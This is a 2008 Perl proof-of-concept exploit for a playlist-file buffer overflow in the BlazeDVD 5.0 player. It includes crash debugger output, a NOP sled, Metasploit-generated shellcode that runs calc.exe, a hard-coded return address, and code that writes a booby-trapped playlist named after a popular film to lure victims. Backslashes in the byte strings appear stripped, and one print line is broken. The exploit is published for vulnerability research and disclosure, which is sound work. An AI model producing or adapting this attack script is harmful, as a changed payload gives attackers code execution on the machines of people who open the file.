#
# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)
#
# Summary: BlazeDVD is a powerful and easy-to-use DVD player. It offers
# superior video and audio (Dolby) quality together with other features such as
# DVD recording, image and DV playback, bookmarks and image capture. Besides
# DVD, Video CD and Audio CD, BlazeDVD plays DIVX, MPEG4, RM, QuickTime, WMV,
# WMV-HD, Macromedia Flash and any other video format for which a codec is
# installed. The player is broadly compatible with hardware and runs on
# Windows 98, 98SE, Me, 2000, XP and Vista.
#
# Product web Page: http://www.blazevideo.com/dvd-player/index.htm
#
# Desc: BlazeDVD 5.0 suffers from a buffer overflow vulnerability that can be
# exploited via a crafted PLF playlist file, locally or remotely. The player
# fails to perform bounds checking on the playlist contents, allowing the saved
# return address (EIP) to be overwritten and thus controlling the next
# instruction executed. After successful exploitation calc.exe is launched.
# The return address used below is hard-coded for the tested platform (see
# "Tested on"); on any other build or locale the overwrite most likely just
# crashes the player, i.e. failed attempts result in a Denial of Service (DoS).
#
# WinDbg output (EIP fully controlled by the 0x41 filler used during testing):
#
# - (4d8.f80): Access violation - code c0000005 (first chance)
# - First chance exceptions are reported before any exception handling.
# - This exception may be expected and handled.
# - eax=00000001 ebx=77f6c15c ecx=04bd0ba8 edx=00000042 esi=01beffc0 edi=6405565c
# - eip=41414141 esp=0012f188 ebp=01befcf8 iopl=0 nv up ei pl nz ac pe nc
# - cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
# - 41414141 ?? ???
#
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Vulnerability discovered by: Parvez Anwar and Greg Linares
#
# Refs:
#
# - http://secunia.com/advisories/23041/
# - http://www.frsirt.com/english/advisories/2006/4764
# - http://xforce.iss.net/xforce/xfdb/30567
# - http://osvdb.org/30770
# - http://www.securityfocus.com/bid/21337/
# - http://www.milw0rm.com/exploits/2880
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm@gmail.com
#
# http://www.zeroscience.org
#
# 08.08.2008
# print "n|==================================================================|n";
print "| |n";
print "| BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit |n";
print "| by LiquidWorm
print "| |n";
print "|==================================================================|nn"; $nop = "x90" x 96;
# win32_exec EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com $shellcode = "x29xc9x83xe9xddxd9xee".
"xd9x74x24xf4x5bx81x73".
"x13x7dxe6xe7x4ex83xeb".
"xfcxe2xf4x81x0exa3x4e".
"x7dxe6x6cx0bx41x6dx9b".
"x4bx05xe7x08xc5x32xfe".
"x6cx11x5dxe7x0cx07xf6".
"xd2x6cx4fx93xd7x27xd7".
"xd1x62x27x3ax7ax27x2d".
"x43x7cx24x0cxbax46xb2".
"xc3x4ax08x03x6cx11x59".
"xe7x0cx28xf6xeaxacxc5".
"x22xfaxe6xa5xf6xfax6c".
"x4fx96x6fxbbx6ax79x25".
"xd6x8ex19x6dxa7x7exf8".
"x26x9fx42xf6xa6xebxc5".
"x0dxfax4axc5x15xeex0c".
"x47xf6x66x57x4ex7dxe6".
"x6cx26x41xb9xd6xb8x1d".
"xb0x6exb6xfex26x9cx1e".
"x15x16x6dx4ax22x8ex7f".
"xb0xf7xe8xb0xb1x9ax85".
"x86x22x1exc8x82x36x18".
"xe6xe7x4e";
$ret = "x78x53xbex01"; $payload = $nop.$shellcode.$ret; open(plf, ">./The_Dark_Knight.plf"); print plf "$payload"; print "n--> Playlist: The_Dark_Knight.plf succesfully created...Enjoy!nn"; print "n...t00t w00t!nan";
# August, 2008